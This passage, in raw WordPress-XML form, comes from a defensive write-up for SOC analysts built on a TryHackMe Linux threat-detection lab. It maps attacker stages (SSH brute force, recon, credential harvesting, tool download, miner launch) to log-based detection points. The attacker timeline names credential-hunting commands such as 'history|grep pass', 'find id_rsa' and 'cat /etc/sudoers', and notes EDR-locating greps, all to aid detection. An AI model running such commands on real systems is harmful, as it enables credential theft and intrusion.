      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    B --&gt;|Auditd Logs: command exec| Det2["Alert on unusual commands by services"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    C --&gt;|Auditd/File Logs| Det3["Detect access to secrets files"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    D --&gt;|Network Logs| Det4["Watch outbound downloads or new SSH sessions"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    E --&gt;|Process/CPU| Det5["Flag unexpected background processes"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    F --&gt;|Net IDS| Det6["Detect port sweeps / ping floods"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  classDef attackNode fill:#f8d7da,stroke:#721c24,stroke-width:1px;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  classDef detectNode fill:#d4edda,stroke:#155724,stroke-width:1px;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  class A,B,C,D,E,F attackNode;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  class Det1,Det2,Det3,Det4,Det5,Det6 detectNode;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure: Mapping of attacker stages to detection points. Each attacker action (red) has corresponding defender signals (green) – e.g. SSH bruteforce shows in auth logs, discovery commands appear in auditd logs, and unusual resource use signals potential miner activity</w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t xml:space="preserve">[3]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="timeline-of-attacker-discovery-steps"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Timeline of Attacker Discovery Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flowchart TB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    subgraph "Attacker Timeline"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      S1[SSH Brute-force (Initial Access)]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      S2[Basic Recon: `hostname`, `id`, `whoami`, `ls`]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      S3[User/Groups: `last`, `w`, `cat /etc/sudoers`]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      S4[Process/Net Recon: `ps aux`, `netstat`, `ping`]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      S5[Credential Harvest: `history|grep pass`, `find *env`, `find id_rsa`]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      S6[Tool Download: `wget`, `curl`, `scp`]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      S7[Persistence &amp; Setup: change password, launch miner (`nohup` etc.)]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    S1 --&gt; S2 --&gt; S3 --&gt; S4 --&gt; S5 --&gt; S6 --&gt; S7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure: Chronological attacker reconnaissance steps. Attackers typically start with brute-forcing SSH, then enumerating basic system info (hostname, OS, user IDs), followed by network and process scans, and finally credential theft and malware deployment. Defenders should align log review in this sequence to spot the chain of activity</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="50" w:name="lessons-learned"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Context Matters:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Common admin commands (e.g.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) can be malicious in context</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Detection relies on seeing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">who</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ran them, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">why</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. For instance,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from a web server user is highly anomalous</w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[4]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Auditd &amp; Logging:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">System auditing is vital. Using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ausearch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on commands (as shown in the article) lets analysts trace back parent processes and scripts</w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[5]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId48">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[14]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Maintaining detailed audit logs and correlating them with process trees uncovers hidden scripts (e.g. finding that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">debug.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">launched</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and TTPs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Living-off-the-Land:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers use built-in tools (wget, curl, scp, find, etc.) to avoid new binaries. Defenders must monitor these tools, not just exotic malware. Detecting file downloads (e.g.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from an external domain</w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[10]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) or scanning tools (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">loops,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netcat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scripts) is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chain of Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The full kill-chain approach was highlighted. From initial SSH brute-force (flagged in auth.log) to discovery commands and final payload execution, each phase leaves artifacts</w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[15]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[12]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Holistically analyzing auth logs, audit logs, and network logs yields comprehensive detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Motivation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Recognizing attacker goals (crypto-mining, credential theft, botnet propagation) guides what to watch. E.g., crypto-miners will check CPU/GPU and launch mining binaries, while data thieves focus on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and SSH keys</w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[12]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="recommendations-for-soc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recommendations for SOC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Auditd Thoroughly:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ensure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auditd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is active on all Linux hosts and logs command executions. Create rules to capture execution of sensitive commands (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, etc.) and monitor parent/child process relationships.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor Unusual Context:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Set alerts for commands run by unexpected users or contexts (e.g.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nginx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user running shell commands). Use EDR or SIEM to flag processes whose parent chain doesn’t match typical usage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network and Auth Alerts:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Watch SSH logs for repeated failures or unexpected successes (brute-force detection). Monitor outbound network activity for rare downloads (wget/curl to unknown domains) or internal scans (mass pings/port scans).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Whitelist Critical Processes:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Harden EDR/AV by whitelisting them to prevent tampering. Detect attempts to locate EDR (e.g.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pgrep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for “crowdstrike”,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">egrep ds_agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) by correlating</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">outputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Regular Vulnerability Checks:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Since attackers seek quick gains (“hack-and-forget”), keep systems patched (limiting exploit vectors) and use honeypots for detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Train on TTPs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use real scenarios (like TryHackMe labs) to refine analyst intuition. Understanding attacker playbooks (as shown in the article) improves readiness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sources:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Techniques and examples are drawn from Furkan Çetiner’s walkthrough</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[3]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and the TryHackMe Linux Threat Detection 2 lab. This integration of known TTPs and command usage aims to assist SOC analysts in detecting Linux intrusions.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkEnd w:id="53"/>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="55"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8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[4]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[5]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[6]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[7]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[8]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[9]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[10]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[11]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[12]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId44">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[13]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId48">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[14]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
